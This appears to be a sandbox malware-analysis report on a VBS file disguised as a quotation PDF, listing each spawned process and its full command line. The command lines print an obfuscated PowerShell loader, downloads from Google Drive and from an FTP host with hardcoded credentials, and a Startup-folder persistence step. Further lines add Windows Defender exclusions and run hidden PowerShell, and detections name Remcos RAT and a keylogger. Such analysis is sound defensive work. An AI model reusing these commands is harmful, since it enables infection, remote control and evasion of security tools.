+ 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '6AHYAaw' + [char]66 + 'xACQAOwApAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4AIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIATwAtAHcAZQ' + [char]66 + 'OACgAIAA9ACAAdA' + [char]66 + '6AHYAaw' + [char]66 + 'xACQAOw' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAMgAxAHMAbA' + [char]66 + 'UADoAOg' + [char]66 + 'dAGUAcA' + [char]66 + '5AFQAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOw' + [char]66 + '9AGUAdQ' + [char]66 + 'yAHQAJA' + [char]66 + '7ACAAPQAgAGsAYw' + [char]66 + 'hAGIAbA' + [char]66 + 'sAGEAQw' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGEAZA' + [char]66 + 'pAGwAYQ' + [char]66 + 'WAGUAdA' + [char]66 + 'hAGMAaQ' + [char]66 + 'mAGkAdA' + [char]66 + 'yAGUAQw' + [char]66 + 'yAGUAdg' + [char]66 + 'yAGUAUwA6ADoAXQ' + [char]66 + 'yAGUAZw' + [char]66 + 'hAG4AYQ' + [char]66 + 'NAHQAbg' + [char]66 + 'pAG8AUA' + [char]66 + 'lAGMAaQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bAHsAIA' + [char]66 + 'lAHMAbA' + [char]66 + 'lAH0AIA' + [char]66 + 'mAC8AIAAwACAAdAAvACAAcgAvACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'uAHcAbw' + [char]66 + 'kAHQAdQ' + [char]66 + 'oAHMAIAA7ACcAMAA4ADEAIA' + [char]66 + 'wAGUAZQ' + [char]66 + 'sAHMAJwAgAGQAbg' + [char]66 + 'hAG0AbQ' + [char]66 + 'vAGMALQAgAGUAeA' + [char]66 + 'lAC4AbA' + [char]66 + 'sAGUAaA' + [char]66 + 'zAHIAZQ' + [char]66 + '3AG8AcAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIAApACAAJw' + [char]66 + 'wAHUAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + 'tAGEAcg' + [char]66 + 'nAG8Acg' + [char]66 + 'QAFwAdQ' + [char]66 + 'uAGUATQAgAHQAcg' + [char]66 + 'hAHQAUw' + [char]66 + 'cAHMAdw' + [char]66 + 'vAGQAbg' + [char]66 + 'pAFcAXA' + [char]66 + '0AGYAbw' + [char]66 + 'zAG8Acg' + [char]66 + 'jAGkATQ' + [char]66 + 'cAGcAbg' + [char]66 + 'pAG0AYQ' + [char]66 + 'vAFIAXA' + [char]66 + 'hAHQAYQ' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AFwAJwAgACsAIA' + [char]66 + 'aAEsAbg' + [char]66 + 'ZAE0AJAAgACgAIA' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGEAbg' + [char]66 + 'pAHQAcw' + [char]66 + 'lAEQALQAgACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAbQ' + [char]66 + 'lAHQASQAtAHkAcA' + [char]66 + 'vAEMAIAA7ACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'zAGUAcg' + [char]66 + 'vAG4ALwAgAHQAZQ' + [char]66 + 'pAHUAcQAvACAARw' + [char]66 + 'jAFcAaQ' + [char]66 + 'SACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'hAHMAdQ' + [char]66 + '3ACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wACAAOwApACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAFQAcg' + [char]66 + 'IAFYAdQAkACgAIAA9ACAARw' + [char]66 + 'jAFcAaQ' + [char]66 + 'SADsAKQAgAGUAbQ' + [char]66 + 'hAE4Acg' + [char]66 + 'lAHMAVQA6ADoAXQ' + [char]66 + '0AG4AZQ' + [char]66 + 'tAG4Abw' + [char]66 + 'yAGkAdg' + [char]66 + 'uAEUAWwAgACsAIAAnAFwAcw' + [char]66 + 'yAGUAcw' + [char]66 + 'VAFwAOg' + [char]66 + 'DACcAKAAgAD0AIA' + [char]66 + 'aAEsAbg' + [char]66 + 'ZAE0AJAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAVA' + [char]66 + 'yAEgAVg' + [char]66 + '1ACQAIAAsAEIASw' + [char]66 + 'MAFIAVQAkACgAZQ' + [char]66 + 'sAGkARg' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + 'oAHYAbA' + [char]66 + 'nAHgAJAA7ADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AaA' + [char]66 + '2AGwAZw' + [char]66 + '4ACQAOwApAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4AIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIATwAtAHcAZQ' + [char]66 + 'OACgAIAA9ACAAaA' + [char]66 + '2AGwAZw' + [char]66 + '4ACQAOw' + [char]66 + '9ADsAIAApACcAdA' + [char]66 + 'PAEwAYw' + [char]66 + 'fAEsAYQAzAFoAZg' + [char]66 + 'vAFgAMg' + [char]66 + 'KAEoAcg' + [char]66 + 'WAGgAbQ' + [char]66 + 'WADkAYw' + [char]66 + 'tADkAWA' + [char]66 + 'zAHUAWA' + [char]66 + 'tAGoAMQ' + [char]66 + 'nADEAJwAgACsAIA' + [char]66 + 'JAG8AcQ' + [char]66 + 'hAEYAJAAoACAAPQAgAEkAbw' + [char]66 + 'xAGEARgAkAHsAIA' + [char]66 + 'lAHMAbA' + [char]66 + 'lAH0AOwAgACkAJwAyADQAdQ' + [char]66 + 'YAEoAVA' + [char]66 + 'xAGEAbQ' + [char]66 + 'nAHkATQ' + [char]66 + '0AEYAeg' + [char]66 + 'hAGsAUA' + [char]66 + 'SADEAcQ' + [char]66 + 'fAEkAdg' + [char]66 + 'HAGkAWA' + [char]66 + 'OAGQAcQ' + [char]66 + 'hAE4AMQAnACAAKwAgAEkAbw' + [char]66 + 'xAGEARgAkACgAIAA9ACAASQ' + [char]66 + 'vAHEAYQ' + [char]66 + 'GACQAewAgACkAIA' + [char]66 + 'yAG0ARQ' + [char]66 + '3AGoAJAAgACgAIA' + [char]66 + 'mAGkAOwAgACkAJwA0ADYAJwAoAHMAbg' + [char]66 + 'pAGEAdA' + [char]66 + 'uAG8AQwAuAEUAUg' + [char]66 + 'VAFQAQw' + [char]66 + 'FAFQASQ' + [char]66 + 'IAEMAUg' + [char]66 + '' + [char]66 + 'AF8AUg' + [char]66 + 'PAFMAUw' + [char]66 + 'FAEMATw' + [char]66 + 'SAFAAOg' + [char]66 + '2AG4AZQAkACAAPQAgAHIAbQ' + [char]66 + 'FAHcAagAkADsAJwA9AGQAaQAmAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8AZAA9AHQAcg' + [char]66 + 'vAHAAeA' + [char]66 + 'lAD8AYw' + [char]66 + '1AC8AbQ' + [char]66 + 'vAGMALg' + [char]66 + 'lAGwAZw' + [char]66 + 'vAG8AZwAuAGUAdg' + [char]66 + 'pAHIAZAAvAC8AOg' + [char]66 + 'zAHAAdA' + [char]66 + '0AGgAJwAgAD0AIA' + [char]66 + 'JAG8AcQ' + [char]66 + 'hAEYAJAA7ACkAIAAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + 'UAHIASA' + [char]66 + 'WAHUAJAAgACgAIA' + [char]66 + 'sAGUAZAA7ACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAVA' + [char]66 + 'yAEgAVg' + [char]66 + '1ACQAewAgACkAIA' + [char]66 + 'MAEEAcg' + [char]66 + '3AEoAJAAgACgAIA' + [char]66 + 'mAGkAOwAgACkAMgAoAHMAbA' + [char]66 + 'hAHUAcQ' + [char]66 + 'FAC4Acg' + [char]66 + 'vAGoAYQ' + [char]66 + 'NAC4Abg' + [char]66 + 'vAGkAcw' + [char]66 + 'yAGUAVgAuAHQAcw' + [char]66 + 'vAGgAJAAgAD0AIA' + [char]66 + 'MAEEAcg' + [char]66 + '3AEoAJAAgADsA';$trrnd = $qKKzc; ;$trrnd = $qKKzc.replace('???' , 'B') ;;$mmqkg = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $trrnd ) ); $mmqkg = $mmqkg[-1..-$mmqkg.Length] -join '';$mmqkg = $mmqkg.replace('%XRqhI%','C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs');powershell $mmqkg
                                                    Imagebase:0x7ff7be880000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:01:08:54
                                                    Start date:07/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:4
                                                    Start time:01:08:57
                                                    Start date:07/10/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$xglvh = (New-Object Net.WebClient);$xglvh.Encoding = [System.Text.Encoding]::UTF8;$xglvh.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$qkvzt.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $qkvzt.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$qkvzt.dispose();$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $qkvzt.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.revres/segami/or.cuicrelotsanomis//:sptth' , $huUPX , 'D D1D' ) );};"
                                                    Imagebase:0x7ff7be880000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:01:09:02
                                                    Start date:07/10/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
                                                    Imagebase:0x7ff7be880000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:6
                                                    Start time:01:09:02
                                                    Start date:07/10/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
                                                    Imagebase:0x7ff7be880000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000006.00000002.2160885075.00000197AAB82000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:7
                                                    Start time:01:09:02
                                                    Start date:07/10/2024
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\"
                                                    Imagebase:0x7ff6c99b0000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:8
                                                    Start time:01:09:03
                                                    Start date:07/10/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x2.ps1"
                                                    Imagebase:0x7ff7be880000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:9
                                                    Start time:01:09:06
                                                    Start date:07/10/2024
                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                    Imagebase:0x7ff6ef0c0000
                                                    File size:496'640 bytes
                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                    Has elevated privileges:true
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:13
                                                    Start time:01:09:11
                                                    Start date:07/10/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1"
                                                    Imagebase:0x7ff7be880000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.2497137064.0000021A90011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2497137064.0000021A90011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.2497137064.0000021A90011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.2497137064.0000021A90011000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.2497137064.0000021A90402000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2497137064.0000021A90402000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.2497137064.0000021A90402000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.2497137064.0000021A90402000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:14
                                                    Start time:01:09:11
                                                    Start date:07/10/2024
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:cmd.exe /c del "C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs"
                                                    Imagebase:0x7ff6c99b0000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:15
                                                    Start time:01:09:15
                                                    Start date:07/10/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                    Imagebase:0x3b0000
                                                    File size:43'008 bytes
                                                    MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:16
                                                    Start time:01:09:15
                                                    Start date:07/10/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                    Imagebase:0x500000
                                                    File size:43'008 bytes
                                                    MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.2903471856.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.2924119312.00000000026BF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                    Has exited:true

                                                    Target ID:17
                                                    Start time:01:09:16
                                                    Start date:07/10/2024
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit
                                                    Imagebase:0x7ff6c99b0000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:18
                                                    Start time:01:09:16
                                                    Start date:07/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:19
                                                    Start time:01:09:17
                                                    Start date:07/10/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit
                                                    Imagebase:0x7ff7be880000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000002.2594444392.000001F1F6B21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.2594444392.000001F1F6B21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000002.2594444392.000001F1F6B21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000013.00000002.2594444392.000001F1F6B21000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    Has exited:true

                                                    Target ID:20
                                                    Start time:01:09:17
                                                    Start date:07/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:21
                                                    Start time:01:09:19
                                                    Start date:07/10/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                    Imagebase:0x270000
                                                    File size:43'008 bytes
                                                    MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:22
                                                    Start time:01:09:19
                                                    Start date:07/10/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                    Imagebase:0x740000
                                                    File size:43'008 bytes
                                                    MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.2292074002.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                    Has exited:true

                                                    Target ID:23
                                                    Start time:01:09:25
                                                    Start date:07/10/2024
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit
                                                    Imagebase:0x7ff6c99b0000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:24
                                                    Start time:01:09:25
                                                    Start date:07/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:25
                                                    Start time:01:09:25
                                                    Start date:07/10/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit
                                                    Imagebase:0x7ff7be880000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000019.00000002.2726582215.0000016510402000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
